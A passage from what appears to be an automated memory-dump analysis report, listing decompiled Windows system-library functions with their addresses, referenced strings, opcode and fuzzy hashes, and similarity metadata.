				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0102BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0102A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0102A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01004620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x00ff1b8f
0x00ff1b9a
0x00ff1b9c
0x00ff1b9e
0x00ff1ba3
0x01047010
0x01047010
0x00000000
0x00ff1ba9
0x00ff1ba9
0x00ff1bae
0x00000000
0x00ff1bc5
0x00ff1bca
0x00ff1bcf
0x00ff1bd0
0x00ff1bd1
0x00ff1bd2
0x00ff1bd6
0x00ff1bdc
0x00ff1be0
0x01046ffc
0x01047000
0x00000000
0x01047006
0x01047009
0x01047009
0x00ff1be6
0x00ff1bec
0x00ff1c0b
0x00ff1c0b
0x00ff1c0c
0x00ff1c11
0x00ff1c12
0x00ff1c15
0x00ff1c1b
0x00ff1c1f
0x00ff1c31
0x00ff1c33
0x01047026
0x01047026
0x00ff1c21
0x00ff1c24
0x00ff1c24
0x00ff1bee
0x00ff1bee
0x00ff1bf2
0x00ff1c3a
0x00ff1bf4
0x00ff1bf4
0x00ff1c05
0x00ff1c05
0x00ff1c09
0x00ff1c3e
0x00000000
0x00000000
0x00000000
0x00ff1c09
0x00ff1bec
0x00ff1be0
0x00ff1bae
0x00ff1c2e

Strings

WindowsExcludedProcs, xrefs: 00FF1BC5

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: c783135cc6a4f70489bb8d137e949dc63ce2adf953483c82da9aca5cb66aaaaf
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 7F21F877A4112DEBDB229A598880FEB77ADFF51B60F154465FA84DB210D731DC00E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0100F716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0100F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x0100f71d
0x0100f722
0x0100f726
0x01054770
0x0100f765
0x0100f769
0x0100f769
0x0100f732
0x0105477a
0x00000000
0x0105477a
0x0100f738
0x0100f73a
0x0100f73c
0x0100f73f
0x0100f746
0x0100f778
0x0100f7a9
0x0100f7a9
0x0100f754
0x0100f75a
0x0100f75d
0x0100f75f
0x0100f761
0x0100f76f
0x0100f771
0x0100f771
0x0100f76f
0x0100f763
0x00000000
0x0100f763
0x0100f77d
0x0100f7a3
0x0100f7a5
0x00000000
0x0100f7a5
0x0100f77f
0x0100f782
0x0100f784
0x0100f786
0x00000000
0x00000000
0x00000000
0x0100f788
0x0100f748
0x0100f74d
0x0100f78d
0x0100f793
0x0100f7b7
0x0100f7bc
0x00000000
0x0100f7bc
0x0100f798
0x00000000
0x00000000
0x0100f79d
0x0100f7b0
0x00000000
0x0100f7b0
0x0100f79f
0x00000000
0x0100f74f
0x0100f74f
0x00000000
0x0100f74f

Strings

Actx , xrefs: 0100F73F

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 6f800aa920470f409672c4787bca0eebf62b78b6d28a4c9d6dee61360d902688
Instruction ID: 3c3391eab8ead43a6fa658cd2b53713e99f00440e09b966be73b18e317ebbfd1
Opcode Fuzzy Hash: 6f800aa920470f409672c4787bca0eebf62b78b6d28a4c9d6dee61360d902688
Instruction Fuzzy Hash: 0811BE35304A038BFBB78E1C849073A76D5BB85664F24456AE9E9CB3D1EBB0C841A343

Uniqueness

Uniqueness Score: -1.00%

Function 01098DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E01098DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x10c0d50);
				E0103D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01075720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0103DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0103DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0103D130(_t34, _t39, _t40);
			}

0x01098df1
0x01098df1
0x01098df1
0x01098df1
0x01098df1
0x01098df1
0x01098df3
0x01098df8
0x01098dfd
0x01098e00
0x01098e0e
0x01098e2a
0x01098e36
0x01098e38
0x01098e3c
0x01098e46
0x01098e46
0x01098e36
0x01098e50
0x01098e56
0x01098e59
0x01098e5c
0x01098e60
0x01098e67
0x01098e6d
0x01098e73
0x01098e74
0x01098eb1
0x01098ebd

Strings

Critical error detected %lx, xrefs: 01098E21

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 5ab0c902ab245237089116c36910934d714bf62af4af8a6a366dae40a0dc16cb
Instruction ID: 64696c56d821fdeb713962ba62a81f2dca78ba59eaf1ba9eb00c9498db4c34ac
Opcode Fuzzy Hash: 5ab0c902ab245237089116c36910934d714bf62af4af8a6a366dae40a0dc16cb
Instruction Fuzzy Hash: 8F1175B5D00348EADF24DFA889157DCBBB4BB05311F20825EE1A9AB392C3340602DF14

Uniqueness

Uniqueness Score: -1.00%

Function 0107FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0107FF60

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 19b5ba5023f264acee345f1e57d1259effdb8842f890f26b7368e843a687d5b7
Instruction ID: 22e82df3c7b1381ea6e4eb39bbf7a8bc22f609627ef3b63b6ed7ea72e4f0cb2c
Opcode Fuzzy Hash: 19b5ba5023f264acee345f1e57d1259effdb8842f890f26b7368e843a687d5b7
Instruction Fuzzy Hash: C4110475910545EFDB22EB54CC48FD8BBF2FF04714F548084F5885B2A1CB399940DB94

Uniqueness

Uniqueness Score: -1.00%

Function 010B5BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E010B5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x10c1178);
				E0103D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E010B4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0102D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E010B5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x10d60e8;
								if( *0x10d60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x10d60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E01029710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E01026DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0102F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0102F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0102F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0102FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0102FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0102F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0102F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E010B4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
